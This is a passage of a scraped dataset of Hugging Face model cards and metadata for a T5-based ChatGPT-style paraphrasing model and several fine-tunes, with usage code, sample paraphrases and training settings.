datasets:
|
| 5 |
+
- humarin/chatgpt-paraphrases
|
| 6 |
+
language:
|
| 7 |
+
- en
|
| 8 |
+
library_name: transformers
|
| 9 |
+
inference:
|
| 10 |
+
parameters:
|
| 11 |
+
num_beams: 5
|
| 12 |
+
num_beam_groups: 5
|
| 13 |
+
num_return_sequences: 5
|
| 14 |
+
repetition_penalty: 10.01
|
| 15 |
+
diversity_penalty: 3.01
|
| 16 |
+
no_repeat_ngram_size: 2
|
| 17 |
+
temperature: 0.7
|
| 18 |
+
max_length: 128
|
| 19 |
+
widget:
|
| 20 |
+
- text: What are the best places to see in New York?
|
| 21 |
+
example_title: New York tourist attractions
|
| 22 |
+
- text: When should I go to the doctor?
|
| 23 |
+
example_title: Doctor's time
|
| 24 |
+
- text: >-
|
| 25 |
+
Rammstein's album Mutter was recorded in the south of France in May and June
|
| 26 |
+
2000, and mixed in Stockholm in October of that year.
|
| 27 |
+
example_title: Rammstein's album Mutter
|
| 28 |
+
pipeline_tag: text2text-generation
|
| 29 |
+
---
|
| 30 |
+
This model was trained on our [ChatGPT paraphrase dataset](https://huggingface.co/datasets/humarin/chatgpt-paraphrases).
|
| 31 |
+
|
| 32 |
+
This dataset is based on [Quora paraphrase questions](https://www.kaggle.com/competitions/quora-question-pairs), texts from [SQuAD 2.0](https://huggingface.co/datasets/squad_v2), and the [CNN news dataset](https://huggingface.co/datasets/cnn_dailymail).
|
| 33 |
+
|
| 34 |
+
This model is based on the T5-base model. We used ""transfer learning"" to get our model to generate paraphrases on par with ChatGPT. Now we can say that this is one of the best paraphrasers available on the Hugging Face Hub.
|
| 35 |
+
|
| 36 |
+
[Kaggle](https://www.kaggle.com/datasets/vladimirvorobevv/chatgpt-paraphrases) link
|
| 37 |
+
|
| 38 |
+
Author 1's [LinkedIn](https://www.linkedin.com/in/vladimir-vorobev/)
|
| 39 |
+
Author 2's [LinkedIn](https://www.linkedin.com/in/makual/)
|
| 40 |
+
|
| 41 |
+
## Deployment example
|
| 42 |
+
```python
|
| 43 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 44 |
+
|
| 45 |
+
device = ""cuda""
|
| 46 |
+
|
| 47 |
+
tokenizer = AutoTokenizer.from_pretrained(""humarin/chatgpt_paraphraser_on_T5_base"")
|
| 48 |
+
|
| 49 |
+
model = AutoModelForSeq2SeqLM.from_pretrained(""humarin/chatgpt_paraphraser_on_T5_base"").to(device)
|
| 50 |
+
|
| 51 |
+
def paraphrase(
|
| 52 |
+
question,
|
| 53 |
+
num_beams=5,
|
| 54 |
+
num_beam_groups=5,
|
| 55 |
+
num_return_sequences=5,
|
| 56 |
+
repetition_penalty=10.0,
|
| 57 |
+
diversity_penalty=3.0,
|
| 58 |
+
no_repeat_ngram_size=2,
|
| 59 |
+
temperature=0.7,
|
| 60 |
+
max_length=128
|
| 61 |
+
):
|
| 62 |
+
input_ids = tokenizer(
|
| 63 |
+
f'paraphrase: {question}',
|
| 64 |
+
return_tensors=""pt"", padding=""longest"",
|
| 65 |
+
max_length=max_length,
|
| 66 |
+
truncation=True,
|
| 67 |
+
).input_ids.to(device)
|
| 68 |
+
|
| 69 |
+
outputs = model.generate(
|
| 70 |
+
input_ids, temperature=temperature, repetition_penalty=repetition_penalty,
|
| 71 |
+
num_return_sequences=num_return_sequences, no_repeat_ngram_size=no_repeat_ngram_size,
|
| 72 |
+
num_beams=num_beams, num_beam_groups=num_beam_groups,
|
| 73 |
+
max_length=max_length, diversity_penalty=diversity_penalty
|
| 74 |
+
)
|
| 75 |
+
|
| 76 |
+
res = tokenizer.batch_decode(outputs, skip_special_tokens=True)
|
| 77 |
+
|
| 78 |
+
return res
|
| 79 |
+
```
|
| 80 |
+
|
| 81 |
+
## Usage examples
|
| 82 |
+
|
| 83 |
+
**Input:**
|
| 84 |
+
```python
|
| 85 |
+
text = 'What are the best places to see in New York?'
|
| 86 |
+
paraphrase(text)
|
| 87 |
+
```
|
| 88 |
+
**Output:**
|
| 89 |
+
```python
|
| 90 |
+
['What are some must-see places in New York?',
|
| 91 |
+
'Can you suggest some must-see spots in New York?',
|
| 92 |
+
'Where should one go to experience the best NYC has to offer?',
|
| 93 |
+
'Which places should I visit in New York?',
|
| 94 |
+
'What are the top destinations to explore in New York?']
|
| 95 |
+
```
|
| 96 |
+
|
| 97 |
+
**Input:**
|
| 98 |
+
```python
|
| 99 |
+
text = ""Rammstein's album Mutter was recorded in the south of France in May and June 2000, and mixed in Stockholm in October of that year.""
|
| 100 |
+
paraphrase(text)
|
| 101 |
+
```
|
| 102 |
+
**Output:**
|
| 103 |
+
```python
|
| 104 |
+
['In May and June 2000, Rammstein travelled to the south of France to record his album Mutter, which was mixed in Stockholm in October of that year.',
|
| 105 |
+
'The album Mutter by Rammstein was recorded in the south of France during May and June 2000, with mixing taking place in Stockholm in October of that year.',
|
| 106 |
+
'The album Mutter by Rammstein was recorded in the south of France during May and June 2000, with mixing taking place in Stockholm in October of that year. It',
|
| 107 |
+
'Mutter, the album released by Rammstein, was recorded in southern France during May and June 2000, with mixing taking place between October and September.',
|
| 108 |
+
'In May and June 2000, Rammstein recorded his album Mutter in the south of France, with the mix being made at Stockholm during October.']
|
| 109 |
+
```
|
| 110 |
+
|
| 111 |
+
|
| 112 |
+
## Train parameters
|
| 113 |
+
```python
|
| 114 |
+
epochs = 5
|
| 115 |
+
batch_size = 64
|
| 116 |
+
max_length = 128
|
| 117 |
+
lr = 5e-5
|
| 118 |
+
batches_qty = 196465
|
| 119 |
+
betas = (0.9, 0.999)
|
| 120 |
+
eps = 1e-08
|
| 121 |
+
```
|
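These values map directly onto a standard Adam configuration; a hypothetical reconstruction in PyTorch (the actual training loop is not published here, and `model` refers to the one loaded in the deployment example above):

```python
# Hypothetical optimizer setup matching the training parameters listed above.
import torch

optimizer = torch.optim.Adam(model.parameters(), lr=5e-5, betas=(0.9, 0.999), eps=1e-08)
```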
| 122 |
+
|
| 123 |
+
### BibTeX entry and citation info
|
| 124 |
+
|
| 125 |
+
```bibtex
|
| 126 |
+
@inproceedings{chatgpt_paraphraser,
|
| 127 |
+
author={Vladimir Vorobev and Maxim Kuznetsov},
|
| 128 |
+
title={A paraphrasing model based on ChatGPT paraphrases},
|
| 129 |
+
year={2023}
|
| 130 |
+
}
|
| 131 |
+
```","{""id"": ""humarin/chatgpt_paraphraser_on_T5_base"", ""author"": ""humarin"", ""sha"": ""e8b5ba0ccb3e3c00c71b005bb9e02b7603a35664"", ""last_modified"": ""2024-08-01 22:57:03+00:00"", ""created_at"": ""2023-03-17 18:22:37+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 115963, ""downloads_all_time"": null, ""likes"": 185, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""t5"", ""text2text-generation"", ""en"", ""dataset:humarin/chatgpt-paraphrases"", ""license:openrail"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- humarin/chatgpt-paraphrases\nlanguage:\n- en\nlibrary_name: transformers\nlicense: openrail\npipeline_tag: text2text-generation\ninference:\n parameters:\n num_beams: 5\n num_beam_groups: 5\n num_return_sequences: 5\n repetition_penalty: 10.01\n diversity_penalty: 3.01\n no_repeat_ngram_size: 2\n temperature: 0.7\n max_length: 128\nwidget:\n- text: What are the best places to see in New York?\n example_title: New York tourist attractions\n- text: When should I go to the doctor?\n example_title: Doctor's time\n- text: Rammstein's album Mutter was recorded in the south of France in May and June\n 2000, and mixed in Stockholm in October of that year.\n example_title: Rammstein's album Mutter"", ""widget_data"": [{""text"": ""What are the best places to see in New York?"", ""example_title"": ""New York tourist attractions""}, {""text"": ""When should I go to the doctor?"", ""example_title"": ""Doctor's time""}, {""text"": ""Rammstein's album Mutter was recorded in the south of France in May and June 2000, and mixed in Stockholm in October of that year."", ""example_title"": ""Rammstein's album Mutter""}], ""model_index"": null, ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""JenkinsGage/WritingHelper"", ""sohomghosh/FinLanSer_Financial_Language_Simplifier"", ""Amitontheweb/InstaoffyzFreeParaphraser"", ""Leonidasiy/NLP-Toolbox"", ""bitcool/humarin-chatgpt_paraphraser_on_T5_base"", ""jgyasu/aiisc-watermarking-model"", ""Xfiles/humarin-chatgpt_paraphraser_on_T5_base"", ""trhacknon/humarin-chatgpt_paraphraser_on_T5_base"", ""prlabs2023/paraphrasing-1"", ""Bazedgul/ChatGPT"", 
""Prezily/humarin-chatgpt_paraphraser_on_T5_base"", ""TrungTech/Financial_Sentiment_Analysis_with_BERT"", ""aisafe/SCA"", ""Towhidul/PECCAVI"", ""Adiityaaa/humarin-chatgpt_paraphraser_on_T5_base"", ""Unityraptor/MediaRephraser"", ""jigyasu2/Text_Paraphraser_and_Non-melting_Points_Highlighter"", ""colllm/humarin-chatgpt_paraphraser_on_T5_base"", ""deb1265/humarin-chatgpt_paraphraser_on_T5_base"", ""NoaiGPT/NoaiGPT-777"", ""Amitontheweb/Text_Paraphraser_Title_Generator"", ""BACKENDAPI2024/aiisc-watermarking-modelv3"", ""IdenGhost/humarin-chatgpt_paraphraser_on_T5_base"", ""JoeArmani/csc525_retrieval_based_chatbot"", ""ravindravala/humaniser"", ""Karthick1087/RapidHumanizeAI"", ""hotech/sampepper"", ""RafaelLima777/humarin-chatgpt_paraphraser_on_T5_base""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-01 22:57:03+00:00"", ""cardData"": ""datasets:\n- humarin/chatgpt-paraphrases\nlanguage:\n- en\nlibrary_name: transformers\nlicense: openrail\npipeline_tag: text2text-generation\ninference:\n parameters:\n num_beams: 5\n num_beam_groups: 5\n num_return_sequences: 5\n repetition_penalty: 10.01\n diversity_penalty: 3.01\n no_repeat_ngram_size: 2\n temperature: 0.7\n max_length: 128\nwidget:\n- text: What are the best places to see in New York?\n example_title: New York tourist attractions\n- text: When should I go to the doctor?\n example_title: Doctor's time\n- text: Rammstein's album Mutter was recorded in the south of France in May and June\n 2000, and mixed in Stockholm in October of that year.\n example_title: Rammstein's album Mutter"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6414afedb6e553f665e31c26"", ""modelId"": ""humarin/chatgpt_paraphraser_on_T5_base"", ""usedStorage"": 8917528089}",0,"https://huggingface.co/codingfaf/paraSci, https://huggingface.co/codingfaf/paraSc_last_two_layers, https://huggingface.co/jaesani/chat_gpt_and_t5_base_paraphraser, https://huggingface.co/TimeDom/Snake",4,"https://huggingface.co/Adiel13ad/Sandboxia, https://huggingface.co/kumar6591/AI",2,"https://huggingface.co/Felladrin/onnx-chatgpt_paraphraser_on_T5_base, https://huggingface.co/nvhf/chatgpt_paraphraser_on_T5_base-Q6_K-GGUF",2,,0,"Amitontheweb/InstaoffyzFreeParaphraser, BACKENDAPI2024/aiisc-watermarking-modelv3, JenkinsGage/WritingHelper, Karthick1087/RapidHumanizeAI, Leonidasiy/NLP-Toolbox, RafaelLima777/humarin-chatgpt_paraphraser_on_T5_base, Xfiles/humarin-chatgpt_paraphraser_on_T5_base, aisafe/SCA, bitcool/humarin-chatgpt_paraphraser_on_T5_base, huggingface/InferenceSupport/discussions/new?title=humarin/chatgpt_paraphraser_on_T5_base&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bhumarin%2Fchatgpt_paraphraser_on_T5_base%5D(%2Fhumarin%2Fchatgpt_paraphraser_on_T5_base)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jgyasu/aiisc-watermarking-model, ravindravala/humaniser, sohomghosh/FinLanSer_Financial_Language_Simplifier",13
|
| 132 |
+
codingfaf/paraSci,"---
|
| 133 |
+
license: openrail
|
| 134 |
+
base_model: humarin/chatgpt_paraphraser_on_T5_base
|
| 135 |
+
tags:
|
| 136 |
+
- generated_from_keras_callback
|
| 137 |
+
model-index:
|
| 138 |
+
- name: codingfaf/paraSci
|
| 139 |
+
results: []
|
| 140 |
+
---
|
| 141 |
+
|
| 142 |
+
<!-- This model card has been generated automatically according to the information Keras had access to. You should
|
| 143 |
+
probably proofread and complete it, then remove this comment. -->
|
| 144 |
+
|
| 145 |
+
# codingfaf/paraSci
|
| 146 |
+
|
| 147 |
+
This model is a fine-tuned version of [humarin/chatgpt_paraphraser_on_T5_base](https://huggingface.co/humarin/chatgpt_paraphraser_on_T5_base) on an unknown dataset.
|
| 148 |
+
It achieves the following results on the evaluation set:
|
| 149 |
+
- Train Loss: 2.2367
|
| 150 |
+
- Validation Loss: 2.0908
|
| 151 |
+
- Epoch: 4
|
| 152 |
+
|
| 153 |
+
## Model description
|
| 154 |
+
|
| 155 |
+
More information needed
|
| 156 |
+
|
| 157 |
+
## Intended uses & limitations
|
| 158 |
+
|
| 159 |
+
More information needed
|
| 160 |
+
|
| 161 |
+
## Training and evaluation data
|
| 162 |
+
|
| 163 |
+
More information needed
|
| 164 |
+
|
| 165 |
+
## Training procedure
|
| 166 |
+
|
| 167 |
+
### Training hyperparameters
|
| 168 |
+
|
| 169 |
+
The following hyperparameters were used during training:
|
| 170 |
+
- optimizer: {'name': 'AdamWeightDecay', 'learning_rate': 2e-05, 'decay': 0.0, 'beta_1': 0.9, 'beta_2': 0.999, 'epsilon': 1e-07, 'amsgrad': False, 'weight_decay_rate': 0.01}
|
| 171 |
+
- training_precision: float32
|
| 172 |
+
|
| 173 |
+
### Training results
|
| 174 |
+
|
| 175 |
+
| Train Loss | Validation Loss | Epoch |
|
| 176 |
+
|:----------:|:---------------:|:-----:|
|
| 177 |
+
| 2.9673 | 2.3630 | 0 |
|
| 178 |
+
| 2.5094 | 2.2455 | 1 |
|
| 179 |
+
| 2.3836 | 2.1726 | 2 |
|
| 180 |
+
| 2.3024 | 2.1257 | 3 |
|
| 181 |
+
| 2.2367 | 2.0908 | 4 |
|
| 182 |
+
|
| 183 |
+
|
| 184 |
+
### Framework versions
|
| 185 |
+
|
| 186 |
+
- Transformers 4.35.2
|
| 187 |
+
- TensorFlow 2.15.0
|
| 188 |
+
- Datasets 2.16.1
|
| 189 |
+
- Tokenizers 0.15.0
|
| 190 |
+
","{""id"": ""codingfaf/paraSci"", ""author"": ""codingfaf"", ""sha"": ""b6aa207c5c8893a404b7443715eebc8e5b1a6963"", ""last_modified"": ""2024-01-24 07:26:41+00:00"", ""created_at"": ""2024-01-20 20:39:51+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tf"", ""t5"", ""text2text-generation"", ""generated_from_keras_callback"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSci\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""codingfaf/paraSci"", ""results"": []}], ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-01-24 07:26:41+00:00"", ""cardData"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSci\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65ac2f97b0b0876790f09501"", ""modelId"": ""codingfaf/paraSci"", ""usedStorage"": 9497113312}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=codingfaf/paraSci&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcodingfaf%2FparaSci%5D(%2Fcodingfaf%2FparaSci)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 191 |
+
codingfaf/paraSc_last_two_layers,"---
|
| 192 |
+
license: openrail
|
| 193 |
+
base_model: humarin/chatgpt_paraphraser_on_T5_base
|
| 194 |
+
tags:
|
| 195 |
+
- generated_from_keras_callback
|
| 196 |
+
model-index:
|
| 197 |
+
- name: codingfaf/paraSc_last_two_layers
|
| 198 |
+
results: []
|
| 199 |
+
---
|
| 200 |
+
|
| 201 |
+
<!-- This model card has been generated automatically according to the information Keras had access to. You should
|
| 202 |
+
probably proofread and complete it, then remove this comment. -->
|
| 203 |
+
|
| 204 |
+
# codingfaf/paraSc_last_two_layers
|
| 205 |
+
|
| 206 |
+
This model is a fine-tuned version of [humarin/chatgpt_paraphraser_on_T5_base](https://huggingface.co/humarin/chatgpt_paraphraser_on_T5_base) on an unknown dataset.
|
| 207 |
+
It achieves the following results on the evaluation set:
|
| 208 |
+
- Train Loss: 2.5083
|
| 209 |
+
- Validation Loss: 2.2250
|
| 210 |
+
- Epoch: 1
|
| 211 |
+
|
| 212 |
+
## Model description
|
| 213 |
+
|
| 214 |
+
More information needed
|
| 215 |
+
|
| 216 |
+
## Intended uses & limitations
|
| 217 |
+
|
| 218 |
+
More information needed
|
| 219 |
+
|
| 220 |
+
## Training and evaluation data
|
| 221 |
+
|
| 222 |
+
More information needed
|
| 223 |
+
|
| 224 |
+
## Training procedure
|
| 225 |
+
|
| 226 |
+
### Training hyperparameters
|
| 227 |
+
|
| 228 |
+
The following hyperparameters were used during training:
|
| 229 |
+
- optimizer: {'name': 'AdamWeightDecay', 'learning_rate': 2e-05, 'decay': 0.0, 'beta_1': 0.9, 'beta_2': 0.999, 'epsilon': 1e-07, 'amsgrad': False, 'weight_decay_rate': 0.01}
|
| 230 |
+
- training_precision: float32
|
| 231 |
+
|
| 232 |
+
### Training results
|
| 233 |
+
|
| 234 |
+
| Train Loss | Validation Loss | Epoch |
|
| 235 |
+
|:----------:|:---------------:|:-----:|
|
| 236 |
+
| 2.9613 | 2.3511 | 0 |
|
| 237 |
+
| 2.5083 | 2.2250 | 1 |
|
| 238 |
+
|
| 239 |
+
|
| 240 |
+
### Framework versions
|
| 241 |
+
|
| 242 |
+
- Transformers 4.35.2
|
| 243 |
+
- TensorFlow 2.15.0
|
| 244 |
+
- Datasets 2.16.1
|
| 245 |
+
- Tokenizers 0.15.1
|
| 246 |
+
","{""id"": ""codingfaf/paraSc_last_two_layers"", ""author"": ""codingfaf"", ""sha"": ""63843dc40eb1e2d1d298088b2826e4c1f9ff174b"", ""last_modified"": ""2024-01-28 02:15:35+00:00"", ""created_at"": ""2024-01-26 12:49:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tf"", ""t5"", ""text2text-generation"", ""generated_from_keras_callback"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:openrail"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSc_last_two_layers\n results: []"", ""widget_data"": null, ""model_index"": [{""name"": ""codingfaf/paraSc_last_two_layers"", ""results"": []}], ""config"": {""architectures"": [""T5ForConditionalGeneration""], ""model_type"": ""t5"", ""tokenizer_config"": {""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='spiece.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-01-28 02:15:35+00:00"", ""cardData"": ""base_model: humarin/chatgpt_paraphraser_on_T5_base\nlicense: openrail\ntags:\n- generated_from_keras_callback\nmodel-index:\n- name: codingfaf/paraSc_last_two_layers\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForSeq2SeqLM"", ""custom_class"": null, ""pipeline_tag"": ""text2text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65b3aa51f32c79fea7c23d90"", ""modelId"": ""codingfaf/paraSc_last_two_layers"", ""usedStorage"": 6538055944}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=codingfaf/paraSc_last_two_layers&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bcodingfaf%2FparaSc_last_two_layers%5D(%2Fcodingfaf%2FparaSc_last_two_layers)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 247 |
+
jaesani/chat_gpt_and_t5_base_paraphraser,"---
|
| 248 |
+
language: en
|
| 249 |
+
thumbnail: https://example.com/thumbnail.png
|
| 250 |
+
tags:
|
| 251 |
+
- paraphrasing
|
| 252 |
+
- T5
|
| 253 |
+
- text generation
|
| 254 |
+
- NLP
|
| 255 |
+
- transformers
|
| 256 |
+
license: mit
|
| 257 |
+
datasets:
|
| 258 |
+
- mteb/quora
|
| 259 |
+
metrics:
|
| 260 |
+
- accuracy
|
| 261 |
+
base_model:
|
| 262 |
+
- humarin/chatgpt_paraphraser_on_T5_base
|
| 263 |
+
library_name: transformers
|
| 264 |
+
---
|
| 265 |
+
|
| 266 |
+
# ChatGPT and T5 Base Paraphraser
|
| 267 |
+
|
| 268 |
+
This model is a fine-tuned version of the T5 transformer model designed for paraphrasing questions; it builds on the humarin/chatgpt_paraphraser_on_T5_base checkpoint (the architecture is T5, not ChatGPT's).
|
| 269 |
+
|
| 270 |
+
## Model Description
|
| 271 |
+
|
| 272 |
+
The `chat_gpt_and_t5_base_paraphraser` model is trained to generate paraphrased versions of input questions using a sequence-to-sequence approach. It leverages the T5 architecture and has been fine-tuned on the Quora Question-Answer dataset to produce more diverse and meaningful paraphrases.
|
| 273 |
+
|
| 274 |
+
## Intended Use
|
| 275 |
+
|
| 276 |
+
This model is intended for applications where paraphrasing of text is required, such as:
|
| 277 |
+
|
| 278 |
+
- Chatbots
|
| 279 |
+
- Question-answering systems
|
| 280 |
+
- Content generation
|
| 281 |
+
- Educational tools
|
| 282 |
+
|
| 283 |
+
## How to Use
|
| 284 |
+
|
| 285 |
+
To use the model, install the Hugging Face `transformers` library and follow these steps:
|
| 286 |
+
|
| 287 |
+
```python
|
| 288 |
+
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
|
| 289 |
+
|
| 290 |
+
# Load the model and tokenizer
|
| 291 |
+
model_name = ""jaesani/chat_gpt_and_t5_base_paraphraser""
|
| 292 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 293 |
+
model = AutoModelForSeq2SeqLM.from_pretrained(model_name)
|
| 294 |
+
|
| 295 |
+
def paraphrase(question, max_length=128):
|
| 296 |
+
input_ids = tokenizer(f'paraphrase: {question}', return_tensors=""pt"", padding=""longest"", max_length=max_length, truncation=True).input_ids
|
| 297 |
+
outputs = model.generate(input_ids, max_length=max_length)
|
| 298 |
+
return tokenizer.decode(outputs[0], skip_special_tokens=True)
|
| 299 |
+
|
| 300 |
+
# Example usage
|
| 301 |
+
paraphrased_text = paraphrase(""What are the best places to see in New York?"")
|
| 302 |
+
print(paraphrased_text)
|
| 303 |
+
```
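|
For more varied outputs, the generation call can be tuned; a minimal sketch (the settings below are illustrative, not the card's recommendation):

```python
# Illustrative only: return several candidate paraphrases via beam search.
input_ids = tokenizer(""paraphrase: What are the best places to see in New York?"", return_tensors=""pt"").input_ids
outputs = model.generate(input_ids, max_length=128, num_beams=5, num_return_sequences=3)
for candidate in outputs:
    print(tokenizer.decode(candidate, skip_special_tokens=True))
```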
|
| 304 |
+
|
| 305 |
+
## Training Data
|
| 306 |
+
The model was fine-tuned using the Quora Question-Answer Dataset, which consists of pairs of questions that may or may not be paraphrases of each other.
|
| 307 |
+
|
| 308 |
+
## Evaluation
|
| 309 |
+
The model's performance can be evaluated based on the diversity and coherence of the paraphrases it generates. Specific metrics can include BLEU scores and human evaluations for semantic similarity.
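|
As one concrete illustration (a sketch, not this card's evaluation protocol; the reference sentence below is hypothetical), sentence-level BLEU can be computed with sacreBLEU:

```python
# Sketch: score one paraphrase against a hypothetical reference with sacreBLEU.
import sacrebleu

candidate = paraphrase(""What are the best places to see in New York?"")
references = [""Which places are worth visiting in New York?""]  # hypothetical reference
print(sacrebleu.sentence_bleu(candidate, references).score)
```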
|
| 310 |
+
|
| 311 |
+
## Limitations
|
| 312 |
+
- The model may produce paraphrases that are not contextually relevant.
|
| 313 |
+
- It may struggle with highly technical or domain-specific language.
|
| 314 |
+
- Generated paraphrases might be similar for closely related input questions.
|
| 315 |
+
|
| 316 |
+
## License
|
| 317 |
+
This model is licensed under MIT License.","{""id"": ""jaesani/chat_gpt_and_t5_base_paraphraser"", ""author"": ""jaesani"", ""sha"": ""0f3920cd77c4ed19eccdeba60dbc0cf7b4a4f23b"", ""last_modified"": ""2024-09-20 13:34:56+00:00"", ""created_at"": ""2024-09-20 13:17:03+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 8, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""t5"", ""text2text-generation"", ""paraphrasing"", ""T5"", ""text generation"", ""NLP"", ""en"", ""dataset:mteb/quora"", ""base_model:humarin/chatgpt_paraphraser_on_T5_base"", ""base_model:finetune:humarin/chatgpt_paraphraser_on_T5_base"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text2text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": 